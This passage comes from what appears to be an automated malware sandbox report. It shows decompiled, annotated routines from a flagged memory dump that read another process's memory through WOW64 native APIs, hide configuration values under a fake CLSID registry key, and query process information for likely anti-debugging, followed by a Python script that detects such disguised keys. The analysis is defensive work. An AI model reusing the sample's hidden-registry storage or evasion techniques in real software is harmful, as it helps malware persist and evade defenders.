                                                                                    				 *((intOrPtr*)(_t33 + 0x80)) = 0x4efdc9c; // vtable of an embedded sub-object at +0x80
                                                                                    				_t34 = 0x10;
                                                                                    				do { // destroy the 16 cached cursor handles stored from +0xc4
                                                                                    					_t29 = DestroyCursor( *_t37);
                                                                                    					_t37 =  &(_t37[1]);
                                                                                    					_t34 = _t34 - 1;
                                                                                    				} while (_t34 != 0);
                                                                                    				return _t29;
                                                                                    			}

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Delete$Object$CursorDestroyRelease
                                                                                    • String ID:
                                                                                    • API String ID: 1665608007-0
                                                                                    • Opcode ID: be77ade47f0160ddfd38729ea740ccbd1a96462737f2c526dbed2d1103537053
                                                                                    • Instruction ID: 4ee8632f17418b36ef5ff2e3e13a00c3464bb7b6c75c961c67391e8afac3da61
                                                                                    • Opcode Fuzzy Hash: be77ade47f0160ddfd38729ea740ccbd1a96462737f2c526dbed2d1103537053
                                                                                    • Instruction Fuzzy Hash: 8C110971A0052ABBEB126F22DD44989BF66FF402A4B101026EA1953520DB36BC35EFD4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 25%
                                                                                    			E04EB5D7C(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a12) {
                                                                                    				signed int _v8;
                                                                                    				intOrPtr _v12;
                                                                                    				intOrPtr _v16;
                                                                                    				char _v32;
                                                                                    				intOrPtr _v72;
                                                                                    				intOrPtr _v76;
                                                                                    				char _v84;
                                                                                    				intOrPtr _v976;
                                                                                    				intOrPtr _v980;
                                                                                    				signed int _v988;
                                                                                    				char _v1100;
                                                                                    				intOrPtr _v1968;
                                                                                    				intOrPtr _v1972;
                                                                                    				char _v2004;
                                                                                    				intOrPtr _v2008;
                                                                                    				char _v2012;
                                                                                    				intOrPtr _v2016;
                                                                                    				signed int _t61;
                                                                                    				struct HINSTANCE__* _t63;
                                                                                    				struct HINSTANCE__* _t65;
                                                                                    				signed int _t86;
                                                                                    				intOrPtr* _t110;
                                                                                    				intOrPtr* _t114;
                                                                                    				intOrPtr _t133;
                                                                                    				intOrPtr* _t135;
                                                                                    				intOrPtr* _t140;
                                                                                    				intOrPtr _t143;
                                                                                    				void* _t144;
                                                                                    				signed int _t147;
                                                                                    				void* _t151;
                                                                                    				signed int _t152;
                                                                                    				intOrPtr _t175;
                                                                                    
                                                                                    				_t114 = __ecx;
                                                                                    				L04ED57B1(_a12);
                                                                                    				_t152 = _t151 + 4;
                                                                                    				E04EDDA58(0, 0);
                                                                                    				asm("int3");
                                                                                    				asm("int3");
                                                                                    				asm("int3");
                                                                                    				asm("int3");
                                                                                    				asm("int3");
                                                                                    				asm("int3");
                                                                                    				asm("int3");
                                                                                    				asm("int3");
                                                                                    				asm("int3");
                                                                                    				asm("int3");
                                                                                    				asm("int3");
                                                                                    				asm("int3");
                                                                                    				asm("int3");
                                                                                    				asm("int3");
                                                                                    				asm("int3");
                                                                                    				asm("int3");
                                                                                    				_t147 = _t152;
                                                                                    				_t61 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t61 ^ _t147;
                                                                                    				_push(__esi);
                                                                                    				_v2016 = __edx;
                                                                                    				_t135 = _t114;
                                                                                    				_t63 = GetModuleHandleA("ntdll.dll");
                                                                                    				if(_t63 != 0) {
                                                                                    					L4:
                                                                                    					_t140 = GetProcAddress(_t63, "NtWow64QueryInformationProcess64");
                                                                                    				} else {
                                                                                    					_t63 = LoadLibraryA("ntdll.dll");
                                                                                    					if(_t63 != 0) {
                                                                                    						goto L4;
                                                                                    					} else {
                                                                                    						_t140 = 0;
                                                                                    					}
                                                                                    				}
                                                                                    				_t65 = GetModuleHandleA("ntdll.dll");
                                                                                    				if(_t65 != 0) {
                                                                                    					L8:
                                                                                    					_t110 = GetProcAddress(_t65, "NtWow64ReadVirtualMemory64");
                                                                                    				} else {
                                                                                    					_t65 = LoadLibraryA("ntdll.dll");
                                                                                    					if(_t65 != 0) {
                                                                                    						goto L8;
                                                                                    					} else {
                                                                                    						_t110 = 0;
                                                                                    					}
                                                                                    				}
                                                                                    				if(_t140 == 0 || _t110 == 0) {
                                                                                    					 *((intOrPtr*)(_t135 + 0x14)) = 7;
                                                                                    					 *((intOrPtr*)(_t135 + 0x10)) = 0;
                                                                                    					 *_t135 = 0;
                                                                                    					E04EB32A0(_t135, 0x4efb5d0);
                                                                                    					__eflags = _v8 ^ _t147;
                                                                                    					return E04ED572E(_v8 ^ _t147, 0);
                                                                                    				} else {
                                                                                    					E04EDDAD0(_t135,  &_v84, 0, 0x30);
                                                                                    					asm("xorps xmm0, xmm0");
                                                                                    					asm("movlpd [ebp-0x7d8], xmm0");
                                                                                    					_push( &_v2012);
                                                                                    					_push(0x30);
                                                                                    					_push( &_v84);
                                                                                    					_push(0);
                                                                                    					_push(_v2016);
                                                                                    					if( *_t140() < 0 || _v2012 != 0x30 || _v2008 != 0) {
                                                                                    						L25:
                                                                                    						E04EB31B0(_t135, _t135, 0x4efb5d0);
                                                                                    						__eflags = _v8 ^ _t147;
                                                                                    						return E04ED572E(_v8 ^ _t147);
                                                                                    					} else {
                                                                                    						_t143 = _v2016;
                                                                                    						_push( &_v2012);
                                                                                    						_push(0);
                                                                                    						_push(0x388);
                                                                                    						_push( &_v2004);
                                                                                    						_push(_v72);
                                                                                    						_push(_v76);
                                                                                    						_push(_t143);
                                                                                    						if( *_t110() < 0 || _v2012 != 0x388 || _v2008 != 0) {
                                                                                    							goto L25;
                                                                                    						} else {
                                                                                    							_push( &_v2012);
                                                                                    							_push(0);
                                                                                    							_push(0x3f8);
                                                                                    							_push( &_v1100);
                                                                                    							_push(_v1968);
                                                                                    							_push(_v1972);
                                                                                    							_push(_t143);
                                                                                    							if( *_t110() < 0 || _v2012 != 0x3f8) {
                                                                                    								goto L25;
                                                                                    							} else {
                                                                                    								_t175 = _v2008;
                                                                                    								if(_t175 != 0) {
                                                                                    									goto L25;
                                                                                    								} else {
                                                                                    									_t86 = (_v988 & 0x0000ffff) + 1;
                                                                                    									_t144 = E04ED5785( ~(_t175 > 0) | _t86 * 0x00000002, _t143, _t175);
                                                                                    									E04EDDAD0(_t135, _t144, 0, 2 + (_v988 & 0x0000ffff) * 2);
                                                                                    									asm("cdq");
                                                                                    									 *_t110(_v2016, _v980, _v976, _t144, _v988 & 0x0000ffff, _t86 * 2 >> 0x20,  &_v2012,  ~(_t175 > 0) | _t86 * 0x00000002);
                                                                                    									E04EB31B0( &_v32, _t135, _t144);
                                                                                    									E04ED573F(_t144);
                                                                                    									 *((intOrPtr*)(_t135 + 0x14)) = 7;
                                                                                    									 *((intOrPtr*)(_t135 + 0x10)) = 0;
                                                                                    									 *_t135 = 0;
                                                                                    									_t133 = _v12;
                                                                                    									if(_t133 >= 8) {
                                                                                    										 *_t135 = _v32;
                                                                                    										_v32 = 0;
                                                                                    									} else {
                                                                                    										_t104 = _v16 + 1;
                                                                                    										if(_v16 + 1 != 0) {
                                                                                    											E04EDCC90(_t135,  &_v32, _t104 + _t104);
                                                                                    											_t133 = _v12;
                                                                                    										}
                                                                                    									}
                                                                                    									 *((intOrPtr*)(_t135 + 0x10)) = _v16;
                                                                                    									 *((intOrPtr*)(_t135 + 0x14)) = _t133;
                                                                                    									_v12 = 7;
                                                                                    									_v16 = 0;
                                                                                    									_v32 = 0;
                                                                                    									E04EB3170( &_v32);
                                                                                    									return E04ED572E(_v8 ^ _t147);
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    0x04eb5d7c
                                                                                    0x04eb5d7f
                                                                                    0x04eb5d84
                                                                                    0x04eb5d8b
                                                                                    0x04eb5d90
                                                                                    0x04eb5d91
                                                                                    0x04eb5d92
                                                                                    0x04eb5d93
                                                                                    0x04eb5d94
                                                                                    0x04eb5d95
                                                                                    0x04eb5d96
                                                                                    0x04eb5d97
                                                                                    0x04eb5d98
                                                                                    0x04eb5d99
                                                                                    0x04eb5d9a
                                                                                    0x04eb5d9b
                                                                                    0x04eb5d9c
                                                                                    0x04eb5d9d
                                                                                    0x04eb5d9e
                                                                                    0x04eb5d9f
                                                                                    0x04eb5da1
                                                                                    0x04eb5da9
                                                                                    0x04eb5db0
                                                                                    0x04eb5db4
                                                                                    0x04eb5dbb
                                                                                    0x04eb5dc1
                                                                                    0x04eb5dc3
                                                                                    0x04eb5dd1
                                                                                    0x04eb5de2
                                                                                    0x04eb5dee
                                                                                    0x04eb5dd3
                                                                                    0x04eb5dd8
                                                                                    0x04eb5ddc
                                                                                    0x00000000
                                                                                    0x04eb5dde
                                                                                    0x04eb5dde
                                                                                    0x04eb5dde
                                                                                    0x04eb5ddc
                                                                                    0x04eb5df5
                                                                                    0x04eb5dfd
                                                                                    0x04eb5e0e
                                                                                    0x04eb5e1a
                                                                                    0x04eb5dff
                                                                                    0x04eb5e04
                                                                                    0x04eb5e08
                                                                                    0x00000000
                                                                                    0x04eb5e0a
                                                                                    0x04eb5e0a
                                                                                    0x04eb5e0a
                                                                                    0x04eb5e08
                                                                                    0x04eb5e1e
                                                                                    0x04eb6021
                                                                                    0x04eb6029
                                                                                    0x04eb6037
                                                                                    0x04eb603a
                                                                                    0x04eb6046
                                                                                    0x04eb6051
                                                                                    0x04eb5e2c
                                                                                    0x04eb5e34
                                                                                    0x04eb5e42
                                                                                    0x04eb5e45
                                                                                    0x04eb5e4d
                                                                                    0x04eb5e4e
                                                                                    0x04eb5e53
                                                                                    0x04eb5e54
                                                                                    0x04eb5e56
                                                                                    0x04eb5e60
                                                                                    0x04eb6000
                                                                                    0x04eb6007
                                                                                    0x04eb6014
                                                                                    0x04eb601e
                                                                                    0x04eb5e80
                                                                                    0x04eb5e80
                                                                                    0x04eb5e8c
                                                                                    0x04eb5e8d
                                                                                    0x04eb5e8f
                                                                                    0x04eb5e9a
                                                                                    0x04eb5e9b
                                                                                    0x04eb5e9e
                                                                                    0x04eb5ea1
                                                                                    0x04eb5ea6
                                                                                    0x00000000
                                                                                    0x04eb5ec9
                                                                                    0x04eb5ecf
                                                                                    0x04eb5ed0
                                                                                    0x04eb5ed2
                                                                                    0x04eb5edd
                                                                                    0x04eb5ede
                                                                                    0x04eb5ee4
                                                                                    0x04eb5eea
                                                                                    0x04eb5eef
                                                                                    0x00000000
                                                                                    0x04eb5f05
                                                                                    0x04eb5f05
                                                                                    0x04eb5f0c
                                                                                    0x00000000
                                                                                    0x04eb5f12
                                                                                    0x04eb5f1b
                                                                                    0x04eb5f30
                                                                                    0x04eb5f44
                                                                                    0x04eb5f5a
                                                                                    0x04eb5f70
                                                                                    0x04eb5f76
                                                                                    0x04eb5f7c
                                                                                    0x04eb5f83
                                                                                    0x04eb5f8a
                                                                                    0x04eb5f94
                                                                                    0x04eb5f97
                                                                                    0x04eb5f9d
                                                                                    0x04eb5fbf
                                                                                    0x04eb5fc1
                                                                                    0x04eb5f9f
                                                                                    0x04eb5fa2
                                                                                    0x04eb5fa5
                                                                                    0x04eb5faf
                                                                                    0x04eb5fb4
                                                                                    0x04eb5fb7
                                                                                    0x04eb5fa5
                                                                                    0x04eb5fcd
                                                                                    0x04eb5fd3
                                                                                    0x04eb5fd6
                                                                                    0x04eb5fdd
                                                                                    0x04eb5fe4
                                                                                    0x04eb5fe8
                                                                                    0x04eb5fff
                                                                                    0x04eb5fff
                                                                                    0x04eb5f0c
                                                                                    0x04eb5eef
                                                                                    0x04eb5ea6
                                                                                    0x04eb5e60

                                                                                    APIs
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 04EB5D8B
                                                                                      • Part of subcall function 04EDDA58: RaiseException.KERNEL32(?,?,?,04ED60CF,76734560,00000000,?,?,?,?,?,?,04ED60CF,04ED5768,04F0056C,04ED5768), ref: 04EDDAB7
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04EB5DC3
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04EB5DD8
                                                                                    • GetProcAddress.KERNEL32(00000000,NtWow64QueryInformationProcess64), ref: 04EB5DE8
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04EB5DF5
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04EB5E04
                                                                                    • GetProcAddress.KERNEL32(00000000,NtWow64ReadVirtualMemory64), ref: 04EB5E14
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressHandleLibraryLoadModuleProc$ExceptionException@8RaiseThrow
                                                                                    • String ID: 0$ntdll.dll
                                                                                    • API String ID: 3650064235-1737626548
                                                                                    • Opcode ID: 45e9f1bb19afdd3feb9185550a6a16780f46d51cefcc0bc83d09d252a223533c
                                                                                    • Instruction ID: 04c92ce15d3cce83f065c59a537fd1e3f4cccaa7e7b0b735714807c2aa2409cf
                                                                                    • Opcode Fuzzy Hash: 45e9f1bb19afdd3feb9185550a6a16780f46d51cefcc0bc83d09d252a223533c
                                                                                    • Instruction Fuzzy Hash: 0D519371E04219ABEF618F61DC41BEFB7B8EF04308F5050A6E909A5140EB74BA84CF95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 95%
                                                                                     			// Writes two values under HKLM\SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}.
                                                                                     			// The key name has the {8-4-4-4-12} shape of a COM class ID but contains non-hex characters
                                                                                     			// (S, T, H, Q, V, Z, G, I, J, U, Y), so it cannot be a real CLSID: it is a configuration store
                                                                                     			// hidden among COM registrations.
                                                                                     			// __ecx: NUL-terminated UTF-16 string, stored as value "1" (REG_SZ).
                                                                                     			// __edx: DWORD, stored as value "2" (REG_DWORD).
                                                                                     			// 0x80000002 = HKEY_LOCAL_MACHINE; 0xf013f = KEY_ALL_ACCESS | KEY_WOW64_64KEY, i.e. the
                                                                                     			// 32-bit process explicitly writes the native 64-bit view instead of WOW6432Node.
                                                                                     			E04EC6DB0(intOrPtr* __ecx, char __edx) {
                                                                                     				void* _v8;
                                                                                     				char _v12;
                                                                                     				char _v16;
                                                                                     				void* _t17;
                                                                                     				long _t18;
                                                                                     				char _t25;
                                                                                     				void* _t30;
                                                                                     				char* _t31;
                                                                                     				char* _t35;
                                                                                     				char* _t36;
                                                                                     				intOrPtr* _t40;
                                                                                     
                                                                                     				_t36 = __ecx;
                                                                                     				_v12 = __edx;
                                                                                     				if(__ecx == 0) {
                                                                                     					return _t17;
                                                                                     				}
                                                                                     				_t40 = __ecx;
                                                                                     				_t30 = __ecx + 2;
                                                                                     				asm("o16 nop [eax+eax]");	// alignment padding before the loop
                                                                                     				do {	// inlined wcslen: advance two bytes per UTF-16 unit until the NUL
                                                                                     					_t18 =  *_t40;
                                                                                     					_t40 = _t40 + 2;
                                                                                     				} while (_t18 != 0);
                                                                                     				if(_t40 - _t30 >> 1 < 1) {	// empty string: nothing to store
                                                                                     					L11:
                                                                                     					return _t18;
                                                                                     				}
                                                                                     				_v8 = 0;
                                                                                     				if(RegCreateKeyExW(0x80000002, L"SOFTWARE\\Classes\\CLSID\\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}", 0, 0, 0, 0xf013f, 0,  &_v8, 0) != 0) {
                                                                                     					L9:
                                                                                     					_v16 = _v12;
                                                                                     					_v8 = 0;
                                                                                     					_t18 = RegCreateKeyExW(0x80000002, L"SOFTWARE\\Classes\\CLSID\\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}", 0, 0, 0, 0xf013f, 0,  &_v8, 0);	// key reopened for value "2"
                                                                                     					if(_t18 == 0) {
                                                                                     						RegSetValueExW(_v8, "2", 0, 4,  &_v16, 4);	// REG_DWORD, 4 bytes; the value name is a wide string at 04EFD124
                                                                                     						_t18 = RegCloseKey(_v8);
                                                                                     					}
                                                                                     					goto L11;
                                                                                     				}
                                                                                     				_t31 = _t36;
                                                                                     				_t35 =  &(_t31[2]);
                                                                                     				do {	// second wcslen pass, this time to size the REG_SZ write
                                                                                     					_t25 =  *_t31;
                                                                                     					_t31 =  &(_t31[2]);
                                                                                     				} while (_t25 != 0);
                                                                                     				RegSetValueExW(_v8, "1", 0, 1, _t36, 2 + (_t31 - _t35 >> 1) * 2);	// REG_SZ, cbData = (chars + 1) * 2, terminator included
                                                                                     				RegCloseKey(_v8);
                                                                                     				goto L9;
                                                                                     			}
                                                                                     Instruction addresses for the listing above: 0x04ec6db7 to 0x04ec6eaf

                                                                                    APIs
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC},00000000,00000000,00000000,000F013F,00000000,04ECBF99,00000000,00000000,00000000), ref: 04EC6E12
                                                                                    • RegSetValueExW.ADVAPI32(00000000,04EFD09C,00000000,00000001,?,00000000), ref: 04EC6E44
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EC6E53
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC},00000000,00000000,00000000,000F013F,00000000,00000000,00000000), ref: 04EC6E87
                                                                                    • RegSetValueExW.ADVAPI32(00000000,04EFD124,00000000,00000004,?,00000004), ref: 04EC6E9F
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EC6EA8
                                                                                    Strings
                                                                                    • SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}, xrefs: 04EC6E01, 04EC6E76
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseCreateValue
                                                                                    • String ID: SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}
                                                                                    • API String ID: 1818849710-2030040551
                                                                                    • Opcode ID: d07ea5b8e847f859fdd67be2074b392c9a802a9fcdb407a91c76af1f43de4a56
                                                                                    • Instruction ID: 92fa96b05eb8d37eb7e6542be74c569c8976e8aec664e8c3e9686a2a0c8444f6
                                                                                    • Opcode Fuzzy Hash: d07ea5b8e847f859fdd67be2074b392c9a802a9fcdb407a91c76af1f43de4a56
                                                                                    • Instruction Fuzzy Hash: 9F21BF75A40308FBEB209B58DD02FAEBB75EB84B04F20015AFE057B1D4D6B17A02DB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 82%
                                                                                     			// Stores a caller-supplied buffer (_a4, _a8 bytes) as REG_BINARY value "1" under
                                                                                     			// HKLM\SOFTWARE\Classes\CLSID\<name>. <name> is produced by E04EC6010, which reads a
                                                                                     			// registry value (the call passes L"Global"); the resulting key name is not visible here.
                                                                                     			// On success a named manual-reset event is created. Access 0xf013f =
                                                                                     			// KEY_ALL_ACCESS | KEY_WOW64_64KEY, so the write is not redirected to WOW6432Node.
                                                                                     			E04EBA970(void* __ebx, void* __ecx, void* __eflags, char* _a4, int _a8) {
                                                                                     				signed int _v8;
                                                                                     				char _v88;
                                                                                     				short _v608;	// 520 bytes below _v88: a 260-WCHAR (MAX_PATH) path buffer
                                                                                     				void* _v612;
                                                                                     				void* __edi;
                                                                                     				void* __esi;
                                                                                     				signed int _t23;
                                                                                     				int _t31;
                                                                                     				struct _CRITICAL_SECTION* _t39;
                                                                                     				char* _t45;
                                                                                     				void* _t56;
                                                                                     				int _t58;
                                                                                     				void* _t61;
                                                                                     				void* _t64;
                                                                                     				signed int _t71;
                                                                                     
                                                                                     				_t69 = _t71;
                                                                                     				_t23 =  *0x4f03008; // 0x3d21fb31
                                                                                     				_v8 = _t23 ^ _t71;	// /GS stack cookie
                                                                                     				_t45 = _a4;
                                                                                     				_push(_t61);
                                                                                     				_t56 = __ecx;
                                                                                     				E04EC6010(_t45, L"Global",  &_v88, __ecx, _t61);
                                                                                     				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);	// key path built from the looked-up name
                                                                                     				_v612 = 0;
                                                                                     				_t31 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0);
                                                                                     				if(_t31 != 0) {
                                                                                     					L2:
                                                                                     					return E04ED572E(_v8 ^ _t69);	// cookie check and return
                                                                                     				} else {
                                                                                     					RegSetValueExW(_v612, "1", _t31, 3, _t45, _a8);	// REG_BINARY (3), _a8 bytes; _t31 (== 0) reused as Reserved
                                                                                     					_t64 =  ==  ? 1 : 0;	// comparison operand lost by the decompiler; tests the RegSetValueExW result
                                                                                     					RegCloseKey(_v612);
                                                                                     					if(_t64 != 0) {
                                                                                     						CreateEventA(0, 1, 0, _t56 + 0xc);	// manual-reset, initially non-signalled, name taken from this+0xc
                                                                                     						E04EDF0D8(0);	// does not return: the int3 padding that follows marks the end of E04EBA970
                                                                                     						asm("int3");
                                                                                     						asm("int3");
                                                                                     						// Everything below belongs to the next routine in memory (a critical-section teardown on
                                                                                     						// an object the decompiler could not type, hence offsets shown as absolute addresses such
                                                                                     						// as *0x00000025). The decompiler merged it into this listing.
                                                                                     						_push(_t56);
                                                                                     						_t58 = 1;
                                                                                     						 *1 = 0x4efcf78;
                                                                                     						if( *0x00000025 == 0) {
                                                                                     							L10:
                                                                                     							_t39 = _t58 + 0x28;
                                                                                     							DeleteCriticalSection(_t39);
                                                                                     							return _t39;
                                                                                     						} else {
                                                                                     							_push(_t64);
                                                                                     							EnterCriticalSection(0x29);
                                                                                     							if( *0x00000025 != 0) {
                                                                                     								_t52 =  *0x00000041;
                                                                                     								 *0x00000025 = 0;
                                                                                     								if( *0x00000041 != 0) {
                                                                                     									E04ECFA50(_t52, 0x29);
                                                                                     									 *0x00000041 = 0;
                                                                                     								}
                                                                                     								LeaveCriticalSection(0x29);
                                                                                     								 *((intOrPtr*)( *_t58 + 4))();	// virtual call through the object's vtable
                                                                                     								goto L10;
                                                                                     							} else {
                                                                                     								LeaveCriticalSection(0x29);
                                                                                     								DeleteCriticalSection(0x29);
                                                                                     								return 0x29;
                                                                                     							}
                                                                                     						}
                                                                                     					} else {
                                                                                     						goto L2;
                                                                                     					}
                                                                                     				}
                                                                                     			}
                                                                                     Instruction addresses for the listing above: 0x04eba971 to 0x04ebaaa8

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EBA9A8
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04EBA9D6
                                                                                    • RegSetValueExW.ADVAPI32(?,04EFD09C,00000000,00000003,?,?), ref: 04EBA9F2
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EBAA08
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 04EBAA31
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseCreateValue$EventOpenQuerywsprintf
                                                                                    • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 2801368686-1865207932
                                                                                    • Opcode ID: e27687ce1986cb78a5729b66c4f330794deb0bc7d74d4b0e6d60d685a08a373e
                                                                                    • Instruction ID: f86be644d39147a0111d7fb7d439d5c94ed81de672d3e65d998bfeb8b45f3e8c
                                                                                    • Opcode Fuzzy Hash: e27687ce1986cb78a5729b66c4f330794deb0bc7d74d4b0e6d60d685a08a373e
                                                                                    • Instruction Fuzzy Hash: 39217271A0121CBBDB20DFA5EC89FABBB7CEF44715F104065BE09E6044D675AE44DBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
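Both E04EC6DB0 and E04EBA970 above store data in value names "1" and "2" under HKLM\SOFTWARE\Classes\CLSID\, one beneath a key whose "GUID" contains non-hex characters and one beneath a key named from a registry lookup, and both open the key with 0xF013F (KEY_ALL_ACCESS | KEY_WOW64_64KEY), so the 32-bit process writes the native 64-bit view. The following script is an added example, not code from the report or from the sample: it models those writes on constructed data and applies a check a responder could run against a live hive. The key name "Global" for the E04EBA970 case and the well-formed comparison GUID are assumptions, not values taken from the sample.

```python
import re
from dataclasses import dataclass, field

# Registry value types from winnt.h, as used in the RegSetValueExW calls above.
REG_SZ, REG_BINARY, REG_DWORD = 1, 3, 4

# Subkeys a genuine COM class registration carries; a config store has none of them.
COM_SUBKEYS = {"InprocServer32", "LocalServer32", "InprocHandler32", "ProgID", "TypeLib"}

# A CLSID is {8-4-4-4-12} hexadecimal digits; anything else under CLSID\ is not a class ID.
CLSID_RE = re.compile(r"^\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")


@dataclass
class ClsidKey:
    name: str
    values: dict                     # value name -> (REG_* type, data)
    subkeys: set = field(default_factory=set)


def is_well_formed_clsid(name: str) -> bool:
    """True for a syntactically valid {GUID}; the sample's key fails this check."""
    return CLSID_RE.match(name) is not None


def classify(key: ClsidKey) -> list:
    """Return the reasons, possibly none, a CLSID subkey looks like a disguised config store."""
    reasons = []
    if not is_well_formed_clsid(key.name):
        reasons.append("key name is not a valid GUID")
    # The sample writes its payload into value names "1"/"2"; COM keys use the default
    # value plus subkeys, never bare numeric value names.
    numeric = sorted(n for n in key.values if n.isdigit())
    if numeric:
        reasons.append("numeric value names: " + ", ".join(numeric))
    if reasons and not (key.subkeys & COM_SUBKEYS):
        reasons.append("no COM server or ProgID subkeys")
    return reasons


def find_suspicious(keys) -> dict:
    """Map each flagged key name to its reasons."""
    hits = {}
    for key in keys:
        reasons = classify(key)
        if reasons:
            hits[key.name] = reasons
    return hits


def sample_keys() -> list:
    """Constructed data modelling the writes decompiled above (not captured from the sample)."""
    return [
        # E04EC6DB0: value "1" = REG_SZ string, value "2" = REG_DWORD, under the fake CLSID.
        ClsidKey("{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}",
                 {"1": (REG_SZ, "example"), "2": (REG_DWORD, 1)}),
        # E04EBA970: value "1" = REG_BINARY blob under CLSID\<name>. The real name comes from
        # E04EC6010 and is not visible in the report; "Global" is an assumption taken from the
        # string passed to that function.
        ClsidKey("Global", {"1": (REG_BINARY, b"\x00" * 16)}),
        # A well-formed registration for comparison (constructed GUID, not a real class).
        ClsidKey("{0A1B2C3D-4E5F-6071-8293-A4B5C6D7E8F9}",
                 {"": (REG_SZ, "Example Class")}, {"InprocServer32"}),
    ]


def scan_live_registry(wow64_64key: bool = True) -> dict:
    """Windows only: walk HKLM\\SOFTWARE\\Classes\\CLSID with winreg; returns {} elsewhere.
    The sample opens its key with KEY_WOW64_64KEY (the 0x100 bit of 0xF013F), so a 32-bit
    scanner must request the 64-bit view as well or it is redirected to WOW6432Node."""
    try:
        import winreg
    except ImportError:
        return {}
    access = winreg.KEY_READ | (winreg.KEY_WOW64_64KEY if wow64_64key else 0)
    keys = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Classes\CLSID", 0, access) as root:
        for i in range(winreg.QueryInfoKey(root)[0]):
            name = winreg.EnumKey(root, i)
            try:
                with winreg.OpenKey(root, name, 0, access) as k:
                    n_sub, n_val, _ = winreg.QueryInfoKey(k)
                    subkeys = {winreg.EnumKey(k, j) for j in range(n_sub)}
                    values = {}
                    for j in range(n_val):
                        vname, data, vtype = winreg.EnumValue(k, j)
                        values[vname] = (vtype, data)
            except OSError:
                continue             # access denied on a few keys is normal
            keys.append(ClsidKey(name, values, subkeys))
    return find_suspicious(keys)


if __name__ == "__main__":
    for name, reasons in find_suspicious(sample_keys()).items():
        print(name, "->", "; ".join(reasons))
    for name, reasons in scan_live_registry().items():
        print("LIVE", name, "->", "; ".join(reasons))
```

The name check alone is enough to catch this sample; the numeric-value and missing-subkey checks are there so the scan also surfaces a key whose name is a syntactically valid GUID but whose contents are not a COM registration.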

                                                                                    C-Code - Quality: 61%
                                                                                     			// Opens a handle to the current process and calls NtQueryInformationProcess with
                                                                                     			// class 0 (ProcessBasicInformation) and a 0x18-byte buffer, which is the 32-bit
                                                                                     			// PROCESS_BASIC_INFORMATION (ExitStatus, PebBaseAddress, AffinityMask, BasePriority,
                                                                                     			// UniqueProcessId, InheritedFromUniqueProcessId). Which field is consumed is not visible
                                                                                     			// in this listing; the PEB address and the parent PID are the fields anti-debugging and
                                                                                     			// sandbox checks usually want from this call.
                                                                                     			E04EC5D00(void* __edi, void* __esi) {
                                                                                     				signed int _v8;
                                                                                     				void _v32;	// 24-byte buffer: sizeof(PROCESS_BASIC_INFORMATION) on x86
                                                                                     				signed int _t6;
                                                                                     				_Unknown_base(*)()* _t11;
                                                                                     				void* _t23;
                                                                                     				signed int _t30;
                                                                                     
